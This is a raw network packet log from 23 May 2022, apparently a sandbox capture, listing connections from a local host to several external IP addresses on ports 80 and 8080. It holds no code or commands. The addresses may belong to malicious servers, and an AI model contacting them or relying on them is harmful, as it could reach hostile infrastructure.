                              May 23, 2022 09:11:05.274089098 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274106026 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274106026 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274127960 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274139881 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274173021 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274173975 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274189949 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274226904 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274230003 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274245024 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274276972 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274286032 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274305105 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274334908 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274348974 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274394989 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274425983 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274473906 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274912119 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274934053 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274950981 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.274977922 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.274990082 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275007010 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275037050 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275116920 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275173903 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275192022 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275207996 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275226116 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275238037 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275242090 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275258064 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275270939 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275295019 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275300980 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275310993 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275331974 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275362015 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275362968 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275381088 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275389910 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275398970 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275414944 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275422096 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275446892 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275456905 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275538921 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275557041 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275558949 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275573015 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275588989 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275589943 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275615931 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275646925 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275654078 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275670052 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275686979 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275695086 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275703907 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275727987 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275757074 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.275772095 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275788069 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.275827885 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.277960062 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.304337978 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.304373026 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.304390907 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.304408073 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.304425001 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.304440022 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.304441929 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.304459095 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.304462910 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.304497957 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.304497957 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.304541111 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305622101 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305650949 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305666924 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305684090 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305692911 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305701017 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305718899 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305732012 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305748940 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305752993 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305757999 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305766106 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305780888 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305782080 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305798054 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305803061 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305815935 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305828094 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305831909 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305849075 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305855036 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305871964 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305875063 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305890083 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305896997 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305907965 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305921078 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305923939 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305948973 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.305949926 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.305975914 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.306011915 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.307818890 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307852030 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307868004 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307884932 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307903051 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307920933 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307921886 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.307938099 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307943106 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.307954073 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307960033 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.307971954 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.307986021 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.307988882 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308006048 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308010101 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308022022 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308034897 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308038950 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308054924 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308058023 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308072090 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308082104 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308088064 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308104038 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308105946 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308120012 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308128119 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308135986 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308152914 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308152914 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308168888 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308175087 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308185101 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.308201075 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308222055 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.308469057 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.334817886 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334847927 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334863901 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334882975 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334892988 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.334899902 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334913969 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.334916115 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.334917068 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334925890 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.334934950 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334944963 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.334952116 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334958076 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.334969997 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334980011 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.334986925 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.334995031 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335002899 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335015059 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335019112 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335027933 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335035086 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335043907 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335053921 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335064888 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335071087 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335078001 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335087061 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335102081 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335104942 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335119009 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335123062 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335133076 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335139990 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335151911 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335158110 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335166931 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335174084 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335191011 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335208893 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335222006 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335225105 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335226059 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335227966 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335242987 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335243940 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335259914 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335263968 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335275888 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335280895 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335292101 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335297108 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335309982 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335318089 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335326910 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335333109 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335344076 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335347891 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335361004 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335365057 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335372925 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335380077 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335387945 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335397005 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335412979 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335429907 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335431099 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335448027 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335448980 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335463047 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335465908 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335484028 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335484982 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335496902 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335500002 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335516930 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335516930 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335527897 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335535049 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335544109 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335551023 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335565090 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335570097 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335577965 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335586071 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335592031 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335602045 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335616112 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335619926 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.335629940 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.335643053 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.336533070 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336555958 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336572886 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336589098 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.336590052 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336604118 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.336606979 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336618900 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.336635113 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.336649895 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336679935 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.336754084 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336801052 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.336839914 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336857080 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.336873055 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.336884022 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.337011099 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.337047100 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.337085009 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.337101936 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.337116957 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.337129116 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.337166071 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.337198973 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.337223053 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.337241888 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:05.337254047 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:05.337269068 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:07.300946951 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:07.301099062 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:12.464468956 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:11:12.466507912 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:11:16.027832031 CEST8049176107.189.3.39192.168.2.22
                              May 23, 2022 09:11:16.027952909 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:11:23.439815044 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:23.482799053 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:23.483169079 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:23.543961048 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:23.586833000 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:23.597753048 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:23.597789049 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:23.597850084 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:23.611505985 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:23.660362005 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:23.660674095 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:27.357820034 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:27.441895008 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:27.736706972 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:27.736819983 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:28.656150103 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:28.699088097 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:28.699161053 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:28.754998922 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:28.797926903 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:28.810859919 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:28.810895920 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:28.811034918 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:28.835515976 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:28.880177975 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:28.880873919 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:29.119657993 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:29.162535906 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:29.163055897 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:29.215929031 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:29.258644104 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:29.269640923 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:29.269670963 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:29.269740105 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:29.276899099 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:29.321459055 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:29.324666023 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:29.496182919 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:29.581789017 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:29.746450901 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:29.746689081 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:30.038295031 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:30.121949911 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:30.289547920 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:30.289969921 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:30.733813047 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:30.733848095 CEST808049177165.22.73.229192.168.2.22
                              May 23, 2022 09:11:30.733992100 CEST491778080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:32.747649908 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:32.747684956 CEST808049179165.22.73.229192.168.2.22
                              May 23, 2022 09:11:32.747826099 CEST491798080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:33.289201975 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:33.289233923 CEST808049180165.22.73.229192.168.2.22
                              May 23, 2022 09:11:33.289377928 CEST491808080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.027375937 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.070420980 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.071338892 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.200769901 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.242854118 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.253952026 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.253982067 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.254185915 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.261413097 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.305515051 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:34.305617094 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:34.944618940 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:35.029506922 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:35.194545031 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:35.194590092 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:35.194817066 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:11:38.196368933 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:38.196434021 CEST808049181165.22.73.229192.168.2.22
                              May 23, 2022 09:11:38.196619987 CEST491818080192.168.2.22165.22.73.229
                              May 23, 2022 09:12:53.079247952 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:53.079525948 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:53.079770088 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:53.079993010 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:12:53.375053883 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:53.376171112 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:53.406249046 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:53.593436003 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:12:53.983469963 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:53.983525991 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:54.137310982 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:54.498347044 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:12:55.184776068 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:12:55.184926987 CEST4917680192.168.2.22107.189.3.39
                              May 23, 2022 09:12:55.481450081 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:12:56.230165958 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:12:57.602967978 CEST4917480192.168.2.2285.114.142.153
